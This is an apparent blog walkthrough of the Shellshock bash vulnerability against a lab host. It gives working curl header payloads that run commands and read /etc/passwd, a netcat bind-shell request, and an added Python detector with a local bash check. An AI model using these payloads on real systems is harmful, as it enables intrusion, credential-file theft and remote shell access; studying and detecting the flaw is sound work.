CVE-2014-6271 – Shellshock

Written on June 24, 2015

I found that vulnerability really interesting as it’s very simple to find and exploit, and we can actually find it on several boxes on the net.

First of all we can use dirb or some other tool to see whether the remote server is running a CGI. When a CGI is called on an Apache server, the server starts a new process and runs the CGI script; Apache passes the request parameters (headers) to the CGI through environment variables. We’ll edit those headers to inject code by declaring an empty function as a bash environment variable ( () { :; }; ) and then appending the evil command that will be run.

CGI found on the box via dirb, along with a valid file, “status”:

(screenshot: dirb output)

Now we can use curl, netcat or a proxy to exploit the Shellshock vuln and run a command.

curl -v 192.168.11.7/cgi-bin/status -H "custom:() { ignored; }; echo Content-Type: text/html; echo; /bin/uname -a"

(screenshot: uname -a output)

We can follow the same steps to run other commands like ls and browse the machine’s file system.

curl -v 192.168.11.7/cgi-bin/status -H "custom:() { ignored; }; echo Content-Type: text/html; echo; /bin/ls -la /"

(screenshot: ls -la / output)

We can also use the cat command to read interesting files like /etc/passwd:

curl -v 192.168.11.7/cgi-bin/status -H "custom:() { ignored; }; echo Content-Type: text/html; echo; /bin/cat /etc/passwd"

(screenshot: /etc/passwd output)

And the fun part: we can use the Linux box’s native software, like netcat, to get a shell on the remote server.

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.11.7 80

(screenshot: bind shell on port 9999)
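From the defender’s side, the requests above all share one marker: a header value that starts with the bash function-definition prefix `() {`. The following added example (my code, not part of the original post) scans raw HTTP requests for that prefix and, as a second check, runs the well-known environment-variable test against the local bash to tell whether it is still affected by CVE-2014-6271. The sample requests are constructed; the bash check assumes `bash` is on the PATH.

```python
import re
import subprocess

# The prefix an unpatched bash parses as a function definition from any
# environment variable, with optional whitespace: "()" followed by "{".
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")


def is_shellshock_attempt(value: str) -> bool:
    """True if a header value carries the Shellshock function-definition prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def scan_headers(raw_request: str) -> list:
    """Return (header name, value) pairs of one raw HTTP request whose value
    looks like a Shellshock payload. Headers end at the first empty line."""
    hits = []
    for line in raw_request.split("\r\n")[1:]:   # skip the request line
        if not line:                              # blank line = end of headers
            break
        name, _, value = line.partition(":")
        if is_shellshock_attempt(value):
            hits.append((name.strip(), value.strip()))
    return hits


def is_local_bash_vulnerable():
    """Run the classic test: export a crafted variable, then ask bash to echo a
    fixed string. Returns True if bash also printed 'vulnerable', False if not,
    and None if bash could not be executed (assumption: bash on the PATH)."""
    try:
        out = subprocess.run(["bash", "-c", "echo this is a test"],
                             env={"x": "() { :;}; echo vulnerable",
                                  "PATH": "/usr/local/bin:/usr/bin:/bin"},
                             capture_output=True, text=True, timeout=5).stdout
    except (FileNotFoundError, subprocess.SubprocessError):
        return None
    return "vulnerable" in out


# Constructed sample requests (not captured traffic): one benign, one mirroring
# the bind-shell request shown above.
BENIGN_REQUEST = ("GET /cgi-bin/status HTTP/1.1\r\nHost: vulnerable\r\n"
                  "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n")
MALICIOUS_REQUEST = ("HEAD /cgi-bin/status HTTP/1.1\r\n"
                     "User-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\n"
                     "Host: vulnerable\r\nConnection: close\r\n\r\n")

if __name__ == "__main__":
    print("benign hits:", scan_headers(BENIGN_REQUEST))
    print("malicious hits:", scan_headers(MALICIOUS_REQUEST))
    print("local bash vulnerable:", is_local_bash_vulnerable())
```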

A valid ISO for testing this vuln can be found at: https://ptl.io/cve-2014-6271.iso

More detailed information about the shellshock vuln can be found at: http://seclists.org/oss-sec/2014/q3/650
